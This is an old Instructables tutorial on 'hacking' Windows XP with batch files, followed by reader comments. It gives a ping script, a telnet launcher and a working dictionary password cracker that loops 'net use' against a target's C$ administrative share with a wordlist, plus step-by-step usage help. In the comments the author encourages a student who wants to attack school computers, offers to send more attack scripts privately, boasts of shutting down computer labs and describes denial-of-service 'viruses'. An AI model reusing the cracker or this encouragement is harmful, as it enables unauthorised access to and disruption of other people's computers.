Introduction: Hacking(sort Of) Windows XP With Batch Programs

Basicly this instructible will teach you how to hack windows computers using the cammand prompt and batch programs.

Step 1: Ping

Ping is a default program in Windows that can be used to ascertain whether your intended target is online or not. The following script uses the ping command tho u could just use the ping command in cmd. It would allow more control over the pinging.


@echo off
Title Pinger
Color a
set /p t=Target IP Adress:
Ping %t%
Echo.
Echo.
Pause
Exit


This code is typed up in notepad or some other text editor. it is then saved with the file extension .bat


Step 2: Telnet

Code:
************************************************************************************************************
@echo off
color a
title Telnet
:start
cls
echo.
echo.
set /p ip=Target IP:
echo.
set /p prt=Port (default: port 23):
echo.
set yn=
set /p yn=Establish a connection (y/n):
if %yn%==y goto tel
if %yn%==Y goto tel
if %yn%==n goto start
if %yn%==N goto start
:tel
telnet %ip% %prt%
pause
goto start
************************************************************************************************************

Type this into Notepad,change file type to All Files, and save as "Telnet.bat".

used properly telnet can can allow direct access to a computers hard drive. once you learn how to use telnet you can use it to delete and copy files to and from your target computer. telnet hacking is a science all its own. learning everything you can do with telnet takes time but it's worth it. as with everything else you could probably find a tutorial on telnet use on the interwebs. to learn its basic commands you could type "telnet /?".

Step 3: Password Crackers

Code:


********************************************************************************


@echo off


title Net Crker by The SYNer


color a


:crk-c1


cls


net view


echo.


echo.


set /p ntar=Target (i.e. \\joel):


echo.


set /p ffile=wordlist Location(i.e. C:\words.txt):


echo.


set /p fname=Name of file(i.e. list.txt):


copy "%ffile%" "C:\lst.txt" >nul


cls


for /f "usebackq" %%i in (C:\lst.txt) do net use %ntar%\C$ %%i /u:Administrator && @echo Username:Administrator && echo Password:%%i


echo.


pause


cls


goto crk-c1


************************************************************************************************************


Copy and paste this into Notepad,change file type to All Files, and save as "NET_CRK.bat".


this program uses a brute force dictionary attack. it is time consuming and one of the slowest ways of breaking a password. but if you have the time and your Dictionary list contains the password it will work.
the trick to breaking the password is to make a good Dictionary list. usually you make a custom list for every password. the trick is to think of passwords that that person would use. unfortunately though it requires that you know this person.

Step 4: Limitations

these things only work if you have administrative privileges. also there is only so much that you can do from command prompt. when it comes to real hacking(dos, phishing, viri, etc.) you need to know a programming language or at least HTML(phishing). using the command prompt is more of a starting point. after which you move on to more advanced hacking.

Comments

author
matrix828 made it! (author)2010-05-09

good 'ible, but i have some questions:
code sample i am going to talk about:
set /p ffile=wordlist Location(i.e. C:\words.txt):
echo.
set /p fname=Name of file(i.e. list.txt):
copy "%ffile%" "C:\lst.txt" >nul


look at the bits in bold italic, WHERE ARE THESE FILES AND WHAT ARE THEY?
thanks.

author
The SYNer made it! (author)The SYNer2016-05-31

wow, talk about late. lst.txt is a file of your making that contains the dictionary.

author
matrix828 made it! (author)matrix8282016-06-16

Thank you for finally replying.

Six long years I waited patiently.

I now understand batch programs.

Thank you again.

(I'm joking around)

author
VictorA10 made it! (author)2015-09-15

I made a much better DDoS program with batch venoc.wordpress.com My website for the DDoS program

author
Techshot made it! (author)2014-10-23

Getting me wrong (haha)..My mistake..actually i tryin to say that post some more cmd "tricks"...
And Yeah the "For" Command is Really useful...

author
The SYNer made it! (author)The SYNer2014-10-23

Oh, alright. Hmm let's see what I can remember...

author
dariusw made it! (author)2014-10-16

Im a noob so what do you mean by "brute force dictionary attack"?

author
The SYNer made it! (author)The SYNer2014-10-16

this is really old stuff and I'm not sure if it still works.

Anyways, a brute force dictionary attack is a simple means of finding passwords. Basically it consists of trying to login with a list of words(a dictionary perhaps). It just tries all of the words in a list until one of them works.

Brute force attacks aren't very effective any more because most logins lock after a certain number of failed logins.

These batch scripts are old and they were made for windows xp. Batch scripts aren't very useful for gaining access anymore, but you can still make some rudimentary viruses. Viruses that fu*k things up by opening a sh!t ton of new windows, crashing or freezing the computer in the process. I wrote one that just ate up memory by creating text files and it was pretty effective.

author
dariusw made it! (author)dariusw2014-10-22

Also if you could post some attack commands. We have windows xp at school and i would love to try it out.

author
The SYNer made it! (author)The SYNer2014-10-22

"Attack Commands"? I mean no offence, but if you think that such commands exist then you are very mistaken about the nature of hacking. To hack is to modify or create a program, usually with malicious intent, that circumvents security protocols or does something that deviates from the intended use of the system that this program is run on. The individual commands aren't designed to hack. It is their implementation that constitutes the hack.

"Attack" commands don't exist. An assortment of commands may "attack" one system or another, but batch commands that "attack" don't exist...unless you decide to make your own. Batch commands are actually just individual programs that are called upon when needed. So if you created an attack program and placed it in the directory that your batch file was running in or in the default directory that the command prompt uses, you would have an attack command. That would be very bad-ass and if you do decide to make such a thing you should totally make an instructable about it.

Also I do have an assortment of batch scripts and cmd programs for that sort of thing. I would be more than happy to send you all the relevant stuff. Just PM me your e-mail.

PS- One of the most important things about being a hacker is to never publicly divulge any of your past, present, or future actions/hacks. Though once upon a time SWIM(someone who isn't me) shut down like 3 computer labs and totally got away with it. XP systems are so vulnerable to the CMD.

author
dariusw made it! (author)dariusw2014-10-22

Okay that's pretty cool. Im a noob and really want to learn about batch files and things of that nature. I was wondering can you send a example of some type either here or to my email. Would be awesome.

author
Techshot made it! (author)2014-10-21

Post some more Cmd Commands

author
The SYNer made it! (author)The SYNer2014-10-21

Dude just open up your command prompt and type in "/?". It will show you a bunch of commands. I'm especially fond of the "for" command. It's so very useful.

author
muffin_boss10 made it! (author)2014-05-09

really works man

author
Strongpwn made it! (author)2010-01-12

 That was a great instructable, helped me get a little more grasp on this new computer world im learning about. Thank You!

author
The SYNer made it! (author)The SYNer2010-01-13

glad 2 help : )

author
Austinstag made it! (author)2009-12-05

i tryed using the net cracker but it just said

*"was unexpected at this time
press any key to continue . . .
plz help

author
The SYNer made it! (author)The SYNer2009-12-23

i'm going 2 update the code cuz i messed up part of it

author
okhaifo made it! (author)2009-10-05

what do you mean by the location of a text files,give examples

author
The SYNer made it! (author)The SYNer2009-10-05

It means the location a text file containing a list of passwords. i.e. C:\wordlist.txt The file must be in C:\ no""

author
ben_lee made it! (author)2009-09-28

How do you use the PINGER???

author
TomTyy made it! (author)2009-07-07

How do you use this?

author
The SYNer made it! (author)The SYNer2009-08-12

sorry it took so long. havnt been online in a long time. for the pinger just put the target's IP address. for telnet put the target's IP address. for password cracker: (1) Type in target IP (2)Type in location of a text file with a list of passwords (3)press enter

author
TomTyy made it! (author)2009-07-07

How do you use the password cracker?

author
The SYNer made it! (author)The SYNer2009-07-17

To use password cracker: (1) Type in name of target comp. (a) to get name of the comp. your on go to cmd an type: net user (b) to get a list of networked computers type in: net view (2) type in location of a text file that contains a list of possible passwords (3) Start the hack

author
vasudev_33 made it! (author)2009-07-14

please tell me how to use the batch files...

About This Instructable

35,287views

54favorites

License:

More by The SYNer:Circular Knitting Needles2 Classic Board Games for the Low Low Price of 69 cents(shipping and handling  included)Boot Foreplay: Vaseline
Add instructable to: